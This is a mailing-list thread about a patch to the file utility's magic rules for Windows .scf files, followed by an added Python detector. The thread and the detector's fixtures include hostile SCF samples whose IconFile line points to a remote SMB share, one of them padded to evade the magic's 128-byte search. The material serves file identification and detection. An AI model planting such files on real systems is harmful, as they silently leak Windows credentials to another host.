[File] [PATCH] Magdir/windows Explorer Command Shell *.SCF described as Generic INI

Christos Zoulas christos at zoulas.com
Wed Nov 30 20:24:55 UTC 2022


Committed, thanks!

christos

> On Nov 30, 2022, at 3:12 PM, Jörg Jenderek <joerg.jen.der.ek at gmx.net> wrote:
> 
> Hello,
> 
> Some days ago I read an interesting article in the German computer
> magazine c't, issue 24 of 2022. It described the efforts and methods
> Microsoft uses to protect their system. Unfortunately Microsoft is
> non-transparent like FIFA and does not explain exactly why something
> is happening. Luckily the article lists 39 file name suffixes that are
> considered potentially dangerous. One extension is SCF.
> 
> So I looked on my systems for such files. When running the file command
> version 5.43 on SCF samples and related files I get output like:
> 
> Desktop anzeigen.scf: Generic INItialization configuration [Taskbar]
> EXPLORER.SCF:         Generic INItialization configuration [Taskbar]
> SETUP.SCF:            Generic INItialization configuration [SERVICE]
> SPELLER.SCF:          data
> channels.scf:         Generic INItialization configuration [IE]
> desktop.scf:          Generic INItialization configuration [Taskbar]
> hadifix.scf:          data
> malicious.scf:        Generic INItialization configuration [Taskbar]
> shortcuts.scf:        XML 1.0 document, ASCII text,
> 
> With the option --extension only the 3-byte sequence ??? or the wrong
> ini/inf is shown, and with the -i option only the generic
> application/x-wine-extension-ini or text/xml is shown.
> 
> For comparison I ran the file format identification utility
> TrID (see https://mark0.net/soft-trid-e.html). The XML-based SCF
> samples are described correctly as "Double Commander Shortcuts" by
> scf-dc.trid.xml. Most other examples are also described, with a low
> rate, as "Generic INI configuration" by ini.trid.xml. The SETUP.SCF
> example is described with a higher rate as "VIA setup configuration
> file" by scf-via.trid.xml. The remaining SCF samples are described as
> "Windows Explorer Command Shell File" by scf-exp.trid.xml or as the
> "(alt)" variant by scf-exp-old.trid.xml (see the appended
> trid-v-scf.txt.gz).
> 
> For comparison I also ran the file format identification
> utility DROID (see https://sourceforge.net/projects/droid/).
> The XML-based SCF is described as "Extensible Markup Language" by
> fmt/101 and the other samples are not recognized.
> 
> The INI-based samples should be recognized by the subroutine ini-file
> inside Magdir/windows. If the samples are only described as Generic
> INItialization configuration, that means a suitable branch is missing
> inside the subroutine. So I looked inside the TrID definition for what
> the characteristic is. There I saw that it tests for a line which looks like:
> [Shell]
> The samples where this is the first line are described by
> scf-exp.trid.xml. In the other case this line occurs as the second line
> after a first empty line. These samples are described by
> scf-exp-old.trid.xml. So inside the subroutine, after the left bracket
> is found, I insert a branch looking for the section name Shell after the
> Windows codepage translator branch. TrID also looks for the keyword
> ICONFILE. When looking in my examples and in the samples considered
> "bad", these contain lines like:
> IconFile=explorer.exe,3
> IconFile=\\10.10.16.2\share\test.ico
> In the second sample an icon or file from somewhere on the net is loaded
> and handled. So this is probably why SCF files are considered potentially
> dangerous. So this information is now shown for such SCF samples by
> lines like:
> >>&0	regex/c	\^Shell]\r\n	Windows Explorer Shell Command File
> !:mime	text/x-ms-scf
> !:ext	scf
> >>>1	search/128	IconFile=	\b, icon
> >>>>&0	string		x		"%s"
> Instead of the generic mime type text/plain I show a user-defined one
> and add information comment lines like:
> # Reference:	http://mark0.net/download/triddefs_xml.7z/defs/s/
> #		scf-exp.trid.xml,
> #		scf-exp-old.trid.xml
> 
> Luckily, with the information given by TrID for the VIA examples, that
> information is expressed by comment lines inside Magdir/images like:
> # URL:		http://en.wikipedia.org/wiki/VIA_Technologies
> # Reference:	http://mark0.net/download/triddefs_xml.7z
> #		defs/s/scf-via.trid.xml
> 
> So I looked inside the TrID definition for what the characteristic is.
> There I saw that it tests for first lines which start like:
> [SCF]
> COMPANY=
> So inside the subroutine, after the left bracket is found, I insert a
> branch looking for the section name SCF after the Windows Explorer Shell
> Command File branch. So this information is now shown for such VIA SCF
> samples by lines like:
> >>&0	regex/c	\^SCF]\r\n	VIA setup configuration
> !:mime	text/x-via-scf
> !:ext	scf
> Instead of the generic mime type text/plain I show a user-defined one.
> 
> After applying the above-mentioned modifications with the patch
> file file-5.43-windows-scf.diff, most SCF samples are
> now described with more detail and the correct name suffix.
> This now looks like:
> 
> Desktop anzeigen.scf: Windows Explorer Shell Command File, icon
> 		      "explorer.exe,3"
> EXPLORER.SCF:         Windows Explorer Shell Command File, icon
> 		      "explorer.exe,1"
> SETUP.SCF:            Generic INItialization configuration [SERVICE]
> SPELLER.SCF:          data
> channels.scf:         Windows Explorer Shell Command File, icon
> 		      "shdocvw.dll,-118"
> desktop.scf:          Windows Explorer Shell Command File, icon
> 		      "explorer.exe,3"
> hadifix.scf:          data
> malicious.scf:        Windows Explorer Shell Command File, icon
> 		      "\\10.10.16.2\share\test.ico"
> shortcuts.scf:        ASCII text, with CRLF line terminators
> 
> I hope my diff file can be applied in a future version of the file
> utility.
> 
> I would like to add magic for Double Commander Shortcuts, but
> in Magdir/sgml there exist "many" fragments for XML-based files. So
> sometimes an XML type is missed, or I must use the -k option and get more
> describing text like "XML 1.0 document text" and "XML document" for the
> shortcuts.scf example, which is confusing for "normal" users and for me too.
> So Magdir/sgml needs some updates that unify the fragments.
> 
> Then there exist samples like SPELLER.SCF and hadifix.scf with
> another file format.
> 
> With best wishes,
> Jörg Jenderek
> --
> Jörg Jenderek
> Attachments: file-5_43-windows-scf_diff, file-5_43-windows-scf_diff_sig, trid-v-scf.txt.gz
> --
> File mailing list
> File at astron.com
> https://mailman.astron.com/mailman/listinfo/file
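The classification the patch adds to the magic, written out as a small stand-alone detector. This is an added example, not code from the file project or from the patch: it keys on the same characteristics the quoted magic and the TrID definitions use (a leading `[Shell]` section, optionally after an empty line, for Explorer SCFs; `[SCF]` followed by `COMPANY=` for VIA setup files; an `IconFile=` key), and additionally flags `IconFile=` targets that point to another host, which is the property that makes files like malicious.scf interesting. The sample contents are constructed to resemble the files listed in the mail and are not the originals; the VIA sample carries only the two lines the mail describes.

```python
"""Classify Windows .scf samples the way the patched magic does, and flag
IconFile= targets that would make Explorer reach out to another host."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ScfInfo:
    kind: str                     # "explorer-shell", "via-setup", "generic-ini", "xml" or "data"
    icon: Optional[str] = None    # value of the IconFile= key, if present
    icon_is_remote: bool = False  # True when the icon lives on another host


# The same characteristics the TrID definitions and the new magic branches use:
# an Explorer SCF opens with "[Shell]", a VIA setup SCF with "[SCF]" + "COMPANY=".
# The magic requires CRLF ("\r\n"); "\r?\n" is accepted here so LF-only files
# are still classified instead of falling through to "generic-ini".
_SHELL_RE = re.compile(rb"^\[Shell\]\r?\n", re.IGNORECASE)
_VIA_RE = re.compile(rb"^\[SCF\]\r?\nCOMPANY=", re.IGNORECASE)
_INI_RE = re.compile(rb"^\[[^\[\]\r\n]+\]\r?\n")
_ICON_RE = re.compile(rb"^IconFile=(.*?)\r?$", re.IGNORECASE | re.MULTILINE)


def _is_remote(target: str) -> bool:
    """A UNC path (\\\\host\\share\\...) or a URL makes Explorer contact another host."""
    t = target.strip().strip('"')
    return t.startswith(("\\\\", "//")) or "://" in t


def classify_scf(data: bytes) -> ScfInfo:
    # The older Explorer variant (scf-exp-old.trid.xml) starts with an empty
    # line, so leading line breaks are dropped before the section name is tested.
    body = data.lstrip(b"\r\n")
    if body.startswith(b"<?xml"):
        return ScfInfo("xml")
    if _SHELL_RE.match(body):
        info = ScfInfo("explorer-shell")
    elif _VIA_RE.match(body):
        info = ScfInfo("via-setup")
    elif _INI_RE.match(body):
        info = ScfInfo("generic-ini")
    else:
        return ScfInfo("data")
    # The magic's "search/128" only reports an IconFile= found within the first
    # 128 bytes; a detector scans the whole file so padding cannot hide the key.
    m = _ICON_RE.search(body)
    if m:
        info.icon = m.group(1).decode("latin-1")
        info.icon_is_remote = _is_remote(info.icon)
    return info


def find_remote_icons(samples: Dict[str, bytes]) -> List[str]:
    """Names of Explorer SCF samples whose icon would be fetched from another host."""
    hits = []
    for name, data in samples.items():
        info = classify_scf(data)
        if info.kind == "explorer-shell" and info.icon_is_remote:
            hits.append(name)
    return hits


# Constructed samples modelled on the files named in the mail; they are not the
# originals. "padded.scf" pushes IconFile= past the magic's 128-byte search window.
SAMPLES: Dict[str, bytes] = {
    "desktop.scf": (b"[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
                    b"[Taskbar]\r\nCommand=ToggleDesktop\r\n"),
    "EXPLORER.SCF": b"\r\n[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,1\r\n",  # old variant
    "malicious.scf": (b"[Shell]\r\nCommand=2\r\n"
                      b"IconFile=\\\\10.10.16.2\\share\\test.ico\r\n"
                      b"[Taskbar]\r\nCommand=ToggleDesktop\r\n"),
    "padded.scf": b"[Shell]\r\n" + b";" * 200 + b"\r\nIconFile=\\\\10.10.16.2\\share\\x.ico\r\n",
    "via-setup.scf": b"[SCF]\r\nCOMPANY=VIA\r\n",
    "shortcuts.scf": b'<?xml version="1.0" encoding="UTF-8"?>\r\n<doublecmd/>\r\n',
    "SPELLER.SCF": b"\x00\x01\x02\x03not an ini file",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:16} {classify_scf(data)}")
    print("remote icons:", find_remote_icons(SAMPLES))
```

Explorer resolves `IconFile=` whenever the folder containing the .scf is displayed, so a UNC target such as `\\10.10.16.2\share\test.ico` causes an outbound SMB connection from the viewing machine without any click; that is the behaviour behind the "potentially dangerous" classification the mail refers to, and it is what `find_remote_icons` surfaces. Two caveats when using the `file` output itself as the signal: the quoted magic only prints the icon when `IconFile=` lies within the first 128 bytes, and it only matches `[Shell]` terminated by CRLF, so a padded or LF-only file still classifies as generic INI there while this detector still reports it.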



More information about the File mailing list